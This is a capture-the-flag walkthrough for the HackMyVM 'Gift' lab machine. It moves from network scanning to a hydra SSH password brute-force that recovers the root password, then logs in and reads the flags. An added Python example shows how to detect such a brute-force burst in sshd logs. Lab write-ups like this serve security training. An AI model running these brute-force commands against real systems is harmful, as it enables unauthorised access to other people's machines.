HackMyVM-Gift

Contents

Information gathering

arp

nmap

WEB

dirsearch

hydra

SSH connection

get root



Information gathering

arp
┌─[root@parrot]─[~]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.106  08:00:27:a3:06:17  PCS Systemtechnik GmbH

Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 6 res

nmap
Port scan

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.106 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:33 GMT
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.62% done; ETC: 10:33 (0:00:02 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.15 seconds

Service and version detection

┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -p 22,80 192.168.9.106 --min-rate 10000 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:38 GMT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 10:38 (0:00:06 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00058s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds


WEB


dirsearch
┌─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.106/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/HackMyVM/reports/http_192.168.9.106/__24-04-13_11-15-10.txt

Target: http://192.168.9.106/

[11:15:10] Starting: 

Task Completed

Simple enough??

hydra
Since port 80 gives us nothing, we just brute-force port 22 directly!

┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.106
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-13 11:15:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.9.106:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 192.168.9.106   login: root   password: simple
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 10 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-13 11:19:19
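
Seen from the server side, the run above is a burst of failed root logins from one address followed by a success. The following detection sketch is an added example, not part of the original write-up; the log lines are constructed, and the ISO-timestamp log format, the 5-failures-in-60-seconds threshold and the function name are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (not captured from the VM); timestamp format is assumed.
SAMPLE_LOG = """\
2024-04-13T11:16:01 gift sshd[2101]: Failed password for root from 192.168.9.102 port 40122 ssh2
2024-04-13T11:16:02 gift sshd[2102]: Failed password for root from 192.168.9.102 port 40124 ssh2
2024-04-13T11:16:03 gift sshd[2103]: Failed password for root from 192.168.9.102 port 40126 ssh2
2024-04-13T11:16:04 gift sshd[2104]: Failed password for root from 192.168.9.102 port 40128 ssh2
2024-04-13T11:16:05 gift sshd[2105]: Failed password for root from 192.168.9.102 port 40130 ssh2
2024-04-13T11:16:06 gift sshd[2106]: Failed password for root from 192.168.9.102 port 40132 ssh2
2024-04-13T11:16:07 gift sshd[2107]: Accepted password for root from 192.168.9.102 port 40134 ssh2
2024-04-13T12:00:10 gift sshd[2201]: Failed password for admin from 192.168.9.50 port 51000 ssh2
2024-04-13T12:00:20 gift sshd[2202]: Accepted password for admin from 192.168.9.50 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Map (ip, user) -> alert for sources reaching `threshold` failures
    inside `window`; 'compromised' is set if a success follows the burst."""
    recent = defaultdict(list)  # (ip, user) -> failure timestamps still in window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            # Slide the window: drop failures older than `window`, add this one.
            recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
            if len(recent[key]) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "compromised": False})
                alert["failures"] = max(alert["failures"], len(recent[key]))
        elif key in alerts:
            # Accepted login from a source that already tripped the threshold.
            alerts[key]["compromised"] = True
    return alerts

if __name__ == "__main__":
    for (ip, user), info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, user, info)
```

A single mistyped password followed by a successful login, like the `admin` lines in the sample, stays below the threshold and raises no alert.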


SSH connection
┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $ssh root@192.168.9.106
root@192.168.9.106's password: 
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~# 

get root
gift:~# cd /root
gift:~# ls -al
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            79 Apr 13 11:23 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat *.txt
HMVtyr543FG
HMV665sXzDS

